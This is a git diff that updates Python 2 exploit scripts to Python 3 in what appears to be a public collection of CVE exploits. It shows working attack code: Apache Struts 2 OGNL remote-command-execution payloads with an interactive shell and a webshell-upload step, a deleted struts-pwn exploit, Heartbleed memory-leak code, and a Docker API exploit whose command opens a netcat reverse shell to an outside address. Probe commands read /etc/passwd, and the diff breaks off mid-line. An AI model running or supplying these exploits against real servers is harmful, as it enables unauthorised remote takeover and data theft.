diff --git a/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py b/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py index fa95518..bda451a 100755 --- a/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py +++ b/CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py @@ -1,13 +1,18 @@ #!/usr/bin/python -import urllib2 +from __future__ import print_function +from future import standard_library +standard_library.install_aliases() +from builtins import input +from builtins import str +import urllib.request, urllib.error, urllib.parse import time import sys import os -import commands +import subprocess import requests import readline -import urlparse +import urllib.parse RED = '\033[1;31m' BLUE = '\033[94m' @@ -21,190 +26,190 @@ def cls(): os.system(['clear', 'cls'][os.name == 'nt']) cls() -logo = BLUE+''' - ___ _____ ___ _ _ _____ ___ - ( _`\(_ _)| _`\ ( ) ( )(_ _)( _`\ +logo = BLUE+''' + ___ _____ ___ _ _ _____ ___ + ( _`\(_ _)| _`\ ( ) ( )(_ _)( _`\ | (_(_) | | | (_) )| | | | | | | (_(_) - `\__ \ | | | , / | | | | | | `\__ \ + `\__ \ | | | , / | | | | | | `\__ \ ( )_) | | | | |\ \ | (_) | | | ( )_) | - `\____) (_) (_) (_)(_____) (_) `\____) + `\____) (_) (_) (_)(_____) (_) `\____) =[ Command Execution v3]= - By @s1kr10s + By @s1kr10s '''+ENDC -print logo - -print " * Ejemplo: http(s)://www.victima.com/files.login\n" -host = raw_input(BOLD+" [+] HOST: "+ENDC) +print(logo) + +print(" * Ejemplo: http(s)://www.victima.com/files.login\n") +host = input(BOLD+" [+] HOST: "+ENDC) if len(host) > 0: - if host.find("https://") != -1 or host.find("http://") != -1: + if host.find("https://") != -1 or host.find("http://") != -1: - poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}" - - def exploit(comando): - exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" - return exploit + poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}" - def exploit2(comando): - exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}" - return exploit2 + def exploit(comando): + exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" + return exploit - def exploit3(comando): - exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D" - return exploit3 + def exploit2(comando): + exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}" + return exploit2 - def pwnd(shellfile): - exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" - return exploitfile + def exploit3(comando): + exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D" + return exploit3 - def validador(): - arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"] - return arr_lin_win + def pwnd(shellfile): + exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" + return exploitfile - #def reversepl(ip,port): - # print "perl" + def validador(): + arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"] + return arr_lin_win - #def reversepy(ip,port): - # print "python" + #def reversepl(ip,port): + # print "perl" - # CVE-2013-2251 --------------------------------------------------------------------------------- - try: - response = '' - response = urllib2.urlopen(host+poc) - except: - print RED+" Servidor no responde\n"+ENDC - exit(0) + #def reversepy(ip,port): + # print "python" - print BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC + # CVE-2013-2251 --------------------------------------------------------------------------------- + try: + response = '' + response = urllib.request.urlopen(host+poc) + except: + print(RED+" Servidor no responde\n"+ENDC) + exit(0) - if response.read().find("mamalo") != -1: - print RED+" [-] VULNERABLE"+ENDC - owned = open('vulnsite.txt', 'a') - owned.write(str(host)+'\n') - owned.close() + print(BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC) - opcion = raw_input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) - #print BOLD+" * [SHELL REVERSA]"+ENDC - #print OTRO+" Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC - if opcion == 's': - print YELLOW+" [-] GET PROMPT...\n"+ENDC - time.sleep(1) - print BOLD+" * [UPLOAD SHELL]"+ENDC - print OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC + if response.read().find("mamalo") != -1: + print(RED+" [-] VULNERABLE"+ENDC) + owned = open('vulnsite.txt', 'a') + owned.write(str(host)+'\n') + owned.close() - while 1: - separador = raw_input(GREEN+"Struts2@Shell_1:$ "+ENDC) - espacio = separador.split(' ') - comando = "','".join(espacio) + opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) + #print BOLD+" * [SHELL REVERSA]"+ENDC + #print OTRO+" Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC + if opcion == 's': + print(YELLOW+" [-] GET PROMPT...\n"+ENDC) + time.sleep(1) + print(BOLD+" * [UPLOAD SHELL]"+ENDC) + print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC) - if espacio[0] != 'reverse' and espacio[0] != 'pwnd': - shell = urllib2.urlopen(host+exploit("'"+str(comando)+"'")) - print "\n"+shell.read() - elif espacio[0] == 'pwnd': - pathsave=raw_input("path EJ:/tmp/: ") + while 1: + separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC) + espacio = separador.split(' ') + comando = "','".join(espacio) - if espacio[1] == 'php': - shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("")'""" - urllib2.urlopen(host+pwnd(str(shellfile))) - shell = urllib2.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'")) - if shell.read().find(pathsave+"status.php") != -1: - print BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC - else: - print BOLD+RED+"\nNo Create File :/\n"+ENDC + if espacio[0] != 'reverse' and espacio[0] != 'pwnd': + shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'")) + print("\n"+shell.read()) + elif espacio[0] == 'pwnd': + pathsave=input("path EJ:/tmp/: ") - # CVE-2017-5638 --------------------------------------------------------------------------------- - print BLUE+" [-] NO VULNERABLE"+ENDC - print BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC - x = 0 - while x < len(validador()): - valida = validador()[x] + if espacio[1] == 'php': + shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("")'""" + urllib.request.urlopen(host+pwnd(str(shellfile))) + shell = urllib.request.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'")) + if shell.read().find(pathsave+"status.php") != -1: + print(BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC) + else: + print(BOLD+RED+"\nNo Create File :/\n"+ENDC) - try: - req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))}) - result = urllib2.urlopen(req).read() + # CVE-2017-5638 --------------------------------------------------------------------------------- + print(BLUE+" [-] NO VULNERABLE"+ENDC) + print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC) + x = 0 + while x < len(validador()): + valida = validador()[x] - if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: - print RED+" [-] VULNERABLE"+ENDC - owned = open('vulnsite.txt', 'a') - owned.write(str(host)+'\n') - owned.close() + try: + req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))}) + result = urllib.request.urlopen(req).read() - opcion = raw_input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) - if opcion == 's': - print YELLOW+" [-] GET PROMPT...\n"+ENDC - time.sleep(1) + if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: + print(RED+" [-] VULNERABLE"+ENDC) + owned = open('vulnsite.txt', 'a') + owned.write(str(host)+'\n') + owned.close() - while 1: - try: - separador = raw_input(GREEN+"\nStruts2@Shell_2:$ "+ENDC) - req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))}) - result = urllib2.urlopen(req).read() - print "\n"+result - except: - exit(0) - else: - x = len(validador()) - else: - print BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x) - except: - pass - x=x+1 + opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) + if opcion == 's': + print(YELLOW+" [-] GET PROMPT...\n"+ENDC) + time.sleep(1) - # CVE-2018-11776 --------------------------------------------------------------------------------- - print BLUE+" [-] NO VULNERABLE"+ENDC - print BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC - x = 0 - while x < len(validador()): - #Filtramos la url solo dominio - url = host.replace('#', '%23') - url = host.replace(' ', '%20') - if ('://' not in url): - url = str("http://") + str(url) - scheme = urlparse.urlparse(url).scheme - site = scheme + '://' + urlparse.urlparse(url).netloc + while 1: + try: + separador = input(GREEN+"\nStruts2@Shell_2:$ "+ENDC) + req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))}) + result = urllib.request.urlopen(req).read() + print("\n"+result) + except: + exit(0) + else: + x = len(validador()) + else: + print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x)) + except: + pass + x=x+1 - #Filtramos la url solo path - file_path = urlparse.urlparse(url).path - if (file_path == ''): - file_path = '/' - - valida = validador()[x] - try: - result = requests.get(site+"/"+exploit3(str(valida))+file_path).text + # CVE-2018-11776 --------------------------------------------------------------------------------- + print(BLUE+" [-] NO VULNERABLE"+ENDC) + print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC) + x = 0 + while x < len(validador()): + #Filtramos la url solo dominio + url = host.replace('#', '%23') + url = host.replace(' ', '%20') + if ('://' not in url): + url = str("http://") + str(url) + scheme = urllib.parse.urlparse(url).scheme + site = scheme + '://' + urllib.parse.urlparse(url).netloc - if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: - print RED+" [-] VULNERABLE"+ENDC - owned = open('vulnsite.txt', 'a') - owned.write(str(host)+'\n') - owned.close() + #Filtramos la url solo path + file_path = urllib.parse.urlparse(url).path + if (file_path == ''): + file_path = '/' - opcion = raw_input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) - if opcion == 's': - print YELLOW+" [-] GET PROMPT...\n"+ENDC - time.sleep(1) - print BOLD+" * [UPLOAD SHELL]"+ENDC - print OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC + valida = validador()[x] + try: + result = requests.get(site+"/"+exploit3(str(valida))+file_path).text - while 1: - separador = raw_input(GREEN+"Struts2@Shell_3:$ "+ENDC) - espacio = separador.split(' ') - comando = "%20".join(espacio) + if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: + print(RED+" [-] VULNERABLE"+ENDC) + owned = open('vulnsite.txt', 'a') + owned.write(str(host)+'\n') + owned.close() - shell = urllib2.urlopen(host+exploit3(str(comando))) - print "\n"+shell.read() - - else: - x = len(validador()) - exit(0) - else: - print BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x) - except: - pass - x=x+1 - else: - print RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC - exit(0) + opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) + if opcion == 's': + print(YELLOW+" [-] GET PROMPT...\n"+ENDC) + time.sleep(1) + print(BOLD+" * [UPLOAD SHELL]"+ENDC) + print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC) + + while 1: + separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC) + espacio = separador.split(' ') + comando = "%20".join(espacio) + + shell = urllib.request.urlopen(host+exploit3(str(comando))) + print("\n"+shell.read()) + + else: + x = len(validador()) + exit(0) + else: + print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x)) + except: + pass + x=x+1 + else: + print(RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC) + exit(0) else: - print RED+" Debe Ingresar una Url\n"+ENDC - exit(0) + print(RED+" Debe Ingresar una Url\n"+ENDC) + exit(0) diff --git a/CVE Exploits/Apache Struts 2 CVE-2017-5638.py b/CVE Exploits/Apache Struts 2 CVE-2017-5638.py deleted file mode 100755 index df93d83..0000000 --- a/CVE Exploits/Apache Struts 2 CVE-2017-5638.py +++ /dev/null @@ -1,176 +0,0 @@ -#!/usr/bin/env python3 -# coding=utf-8 -# ***************************************************** -# struts-pwn: Apache Struts CVE-2017-5638 Exploit -# Author: -# Mazin Ahmed -# This code is based on: -# https://www.exploit-db.com/exploits/41570/ -# https://www.seebug.org/vuldb/ssvid-92746 -# ***************************************************** -import sys -import random -import requests -import argparse - -# Disable SSL warnings -try: - import requests.packages.urllib3 - requests.packages.urllib3.disable_warnings() -except: - pass - -if len(sys.argv) <= 1: - print('[*] CVE: 2017-5638 - Apache Struts2 S2-045') - print('[*] Struts-PWN - @mazen160') - print('\n%s -h for help.' % (sys.argv[0])) - exit(0) - -parser = argparse.ArgumentParser() -parser.add_argument("-u", "--url", - dest="url", - help="Check a single URL.", - action='store') -parser.add_argument("-l", "--list", - dest="usedlist", - help="Check a list of URLs.", - action='store') -parser.add_argument("-c", "--cmd", - dest="cmd", - help="Command to execute. (Default: id)", - action='store', - default='id') -parser.add_argument("--check", - dest="do_check", - help="Check if a target is vulnerable.", - action='store_true') -args = parser.parse_args() -url = args.url if args.url else None -usedlist = args.usedlist if args.usedlist else None -url = args.url if args.url else None -cmd = args.cmd if args.cmd else None -do_check = args.do_check if args.do_check else None - - -def url_prepare(url): - url = url.replace('#', '%23') - url = url.replace(' ', '%20') - if ('://' not in url): - url = str('http') + str('://') + str(url) - return(url) - - -def exploit(url, cmd): - url = url_prepare(url) - print('\n[*] URL: %s' % (url)) - print('[*] CMD: %s' % (cmd)) - - payload = "%{(#_='multipart/form-data')." - payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." - payload += "(#_memberAccess?" - payload += "(#_memberAccess=#dm):" - payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." - payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." - payload += "(#ognlUtil.getExcludedPackageNames().clear())." - payload += "(#ognlUtil.getExcludedClasses().clear())." - payload += "(#context.setMemberAccess(#dm))))." - payload += "(#cmd='%s')." % cmd - payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." - payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." - payload += "(#p=new java.lang.ProcessBuilder(#cmds))." - payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." - payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." - payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." - payload += "(#ros.flush())}" - - headers = { - 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)', - # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', - 'Content-Type': str(payload), - 'Accept': '*/*' - } - - timeout = 3 - try: - output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - output = 'ERROR' - return(output) - - -def check(url): - url = url_prepare(url) - print('\n[*] URL: %s' % (url)) - - random_string = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for i in range(7)) - - payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']." - payload += "addHeader('%s','%s')}.multipart/form-data" % (random_string, random_string) - headers = { - 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)', - # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', - 'Content-Type': str(payload), - 'Accept': '*/*' - } - - timeout = 3 - try: - resp = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) - if ((random_string in resp.headers.keys()) and (resp.headers[random_string] == random_string)): - result = True - else: - result = False - except Exception as e: - print("EXCEPTION::::--> " + str(e)) - result = False - return(result) - - -def main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check): - if url: - if do_check: - result = check(url) # Only check for existence of Vulnerablity - output = '[*] Status: ' - if result is True: - output += 'Vulnerable!' - else: - output += 'Not Affected.' - else: - output = exploit(url, cmd) # Exploit - print(output) - - if usedlist: - URLs_List = [] - try: - f_file = open(str(usedlist), 'r') - URLs_List = f_file.read().replace('\r', '').split('\n') - try: - URLs_List.remove('') - except ValueError: - pass - f_file.close() - except: - print('Error: There was an error in reading list file.') - exit(1) - for url in URLs_List: - if do_check: - result = check(url) # Only check for existence of Vulnerablity - output = '[*] Status: ' - if result is True: - output += 'Vulnerable!' - else: - output += 'Not Affected.' - else: - output = exploit(url, cmd) # Exploit - print(output) - - print('[%] Done.') - -if __name__ == '__main__': - try: - main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check) - except KeyboardInterrupt: - print('\nKeyboardInterrupt Detected.') - print('Exiting...') - exit(0) diff --git a/CVE Exploits/Apache Struts 2 CVE-2017-9805.py b/CVE Exploits/Apache Struts 2 CVE-2017-9805.py index 9cd6cce..4eb64f5 100755 --- a/CVE Exploits/Apache Struts 2 CVE-2017-9805.py +++ b/CVE Exploits/Apache Struts 2 CVE-2017-9805.py @@ -8,6 +8,8 @@ # https://github.com/rapid7/metasploit-framework/pull/8924 # https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/ # ***************************************************** +from __future__ import print_function +from builtins import str import argparse import requests import sys diff --git a/CVE Exploits/Apache Struts 2 CVE-2018-11776.py b/CVE Exploits/Apache Struts 2 CVE-2018-11776.py index edbf3c5..7fb1174 100755 --- a/CVE Exploits/Apache Struts 2 CVE-2018-11776.py +++ b/CVE Exploits/Apache Struts 2 CVE-2018-11776.py @@ -8,6 +8,11 @@ # https://github.com/jas502n/St2-057 # ***************************************************** +from __future__ import print_function +from future import standard_library +standard_library.install_aliases() +from builtins import str +from builtins import range import argparse import random import requests @@ -15,7 +20,7 @@ import sys try: from urllib import parse as urlparse except ImportError: - import urlparse + import urllib.parse # Disable SSL warnings try: @@ -77,13 +82,13 @@ def parse_url(url): if ('://' not in url): url = str("http://") + str(url) - scheme = urlparse.urlparse(url).scheme + scheme = urllib.parse.urlparse(url).scheme # Site: http://example.com - site = scheme + '://' + urlparse.urlparse(url).netloc + site = scheme + '://' + urllib.parse.urlparse(url).netloc # FilePath: /demo/struts2-showcase/index.action - file_path = urlparse.urlparse(url).path + file_path = urllib.parse.urlparse(url).path if (file_path == ''): file_path = '/' @@ -154,7 +159,7 @@ def check(url): except Exception as e: print("EXCEPTION::::--> " + str(e)) continue - if "Location" in resp.headers.keys(): + if "Location" in list(resp.headers.keys()): if str(multiplication_value) in resp.headers['Location']: print("[*] Status: Vulnerable!") return(injection_point) diff --git a/CVE Exploits/Docker API RCE.py b/CVE Exploits/Docker API RCE.py index 1f8cea9..8880a16 100644 --- a/CVE Exploits/Docker API RCE.py +++ b/CVE Exploits/Docker API RCE.py @@ -1,3 +1,4 @@ +from __future__ import print_function import requests import logging import json @@ -23,7 +24,7 @@ if r.json: for container in r.json(): container_id = container['Id'] container_name = container['Names'][0].replace('/','') - print(container_id, container_name) + print((container_id, container_name)) # Step 2 - Prepare command cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]' diff --git a/CVE Exploits/Heartbleed CVE-2014-0160.py b/CVE Exploits/Heartbleed CVE-2014-0160.py index 60672a3..42907c1 100755 --- a/CVE Exploits/Heartbleed CVE-2014-0160.py +++ b/CVE Exploits/Heartbleed CVE-2014-0160.py @@ -4,6 +4,9 @@ # The author disclaims copyright to this source code. # Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin) +from __future__ import print_function +from builtins import str +from builtins import range import sys import struct import socket @@ -61,12 +64,12 @@ def hexdump(s, dumpf, quiet): dump.write(s) dump.close() if quiet: return - for b in xrange(0, len(s), 16): + for b in range(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) - print ' %04x: %-48s %s' % (b, hxdat, pdat) - print + print(' %04x: %-48s %s' % (b, hxdat, pdat)) + print() def recvall(s, length, timeout=5): endtime = time.time() + timeout @@ -92,57 +95,57 @@ def recvall(s, length, timeout=5): def recvmsg(s): hdr = recvall(s, 5) if hdr is None: - print 'Unexpected EOF receiving record header - server closed connection' + print('Unexpected EOF receiving record header - server closed connection') return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: - print 'Unexpected EOF receiving record payload - server closed connection' + print('Unexpected EOF receiving record payload - server closed connection') return None, None, None - print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) + print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))) return typ, ver, pay def hit_hb(s, dumpf, host, quiet): while True: typ, ver, pay = recvmsg(s) if typ is None: - print 'No heartbeat response received from '+host+', server likely not vulnerable' + print('No heartbeat response received from '+host+', server likely not vulnerable') return False if typ == 24: - if not quiet: print 'Received heartbeat response:' + if not quiet: print('Received heartbeat response:') hexdump(pay, dumpf, quiet) if len(pay) > 3: - print 'WARNING: server '+ host +' returned more data than it should - server is vulnerable!' + print('WARNING: server '+ host +' returned more data than it should - server is vulnerable!') else: - print 'Server '+host+' processed malformed heartbeat, but did not return any extra data.' + print('Server '+host+' processed malformed heartbeat, but did not return any extra data.') return True if typ == 21: - if not quiet: print 'Received alert:' + if not quiet: print('Received alert:') hexdump(pay, dumpf, quiet) - print 'Server '+ host +' returned error, likely not vulnerable' + print('Server '+ host +' returned error, likely not vulnerable') return False def connect(host, port, quiet): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - if not quiet: print 'Connecting...' + if not quiet: print('Connecting...') sys.stdout.flush() s.connect((host, port)) return s def tls(s, quiet): - if not quiet: print 'Sending Client Hello...' + if not quiet: print('Sending Client Hello...') sys.stdout.flush() s.send(hello) - if not quiet: print 'Waiting for Server Hello...' + if not quiet: print('Waiting for Server Hello...') sys.stdout.flush() def parseresp(s): while True: typ, ver, pay = recvmsg(s) if typ == None: - print 'Server closed connection without sending Server Hello.' + print('Server closed connection without sending Server Hello.') return 0 # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: @@ -156,10 +159,10 @@ def check(host, port, dumpf, quiet, starttls): s.ehlo() s.starttls() except smtplib.SMTPException: - print 'STARTTLS not supported...' + print('STARTTLS not supported...') s.quit() return False - print 'STARTTLS supported...' + print('STARTTLS supported...') s.quit() s = connect(host, port, quiet) s.settimeout(1) @@ -170,7 +173,7 @@ def check(host, port, dumpf, quiet, starttls): s.send('starttls\r\n') re = s.recv(1024) except socket.timeout: - print 'Timeout issues, going ahead anyway, but it is probably broken ...' + print('Timeout issues, going ahead anyway, but it is probably broken ...') tls(s,quiet) else: s = connect(host, port, quiet) @@ -179,13 +182,13 @@ def check(host, port, dumpf, quiet, starttls): version = parseresp(s) if version == 0: - if not quiet: print "Got an error while parsing the response, bailing ..." + if not quiet: print("Got an error while parsing the response, bailing ...") return False else: version = version - 0x0300 - if not quiet: print "Server TLS version was 1.%d\n" % version + if not quiet: print("Server TLS version was 1.%d\n" % version) - if not quiet: print 'Sending heartbeat request...' + if not quiet: print('Sending heartbeat request...') sys.stdout.flush() if (version == 1): s.send(hbv10) @@ -205,8 +208,8 @@ def main(): options.print_help() return - print 'Scanning ' + args[0] + ' on port ' + str(opts.port) - for 